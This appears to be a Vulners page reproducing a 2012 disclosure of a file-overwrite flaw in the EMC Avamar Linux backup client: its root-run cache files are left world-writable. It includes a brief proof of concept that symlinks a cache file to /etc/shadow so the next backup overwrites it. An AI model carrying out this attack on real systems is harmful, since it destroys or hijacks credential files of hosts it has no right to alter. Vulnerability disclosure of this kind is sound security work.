Vulners
Lucene search
EMC Avamar 6.1.100-402 File Overwrite
`Product: Avamar backup client for Linux (Proberly also Unix but not tested)
Vendor: EMC (http://www.emc.com)
Tested version: 6.1.100-402 (Latest)
Vendor Notification: December 17, 2012
Vender Patch: None
Vender Workaround: <quote>workaround is to run a script at the end of each backup which set the files permissions to be read/write for the owner only</quote>
Vender Response: Will maybe be patched in version 7 mid-2013 since EMC does not patch for security
Solution Status: None
Risk Level: High
Details:
The avamar client runs as root and after each backup it leavs the cache files as world writable:
# ls -latr /var/avamar/f_cache.dat
-rw-rw-rw- 1 root root 11534880 Dec 17 10:30 /var/avamar/f_cache.dat
# ls -latr /var/avamar/p_cache.dat
-rw-rw-rw- 1 root root 3146272 Dec 17 10:30 /var/avamar/p_cache.dat
Fun && profit:
# id
uid=1000(slave) gid=1000(slave) groups=1000(slave)
# cd /var/avamar
# ln -sf /etc/shadow p_cache.dat
and wait for the next backup window.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Dec 2012 00:00Current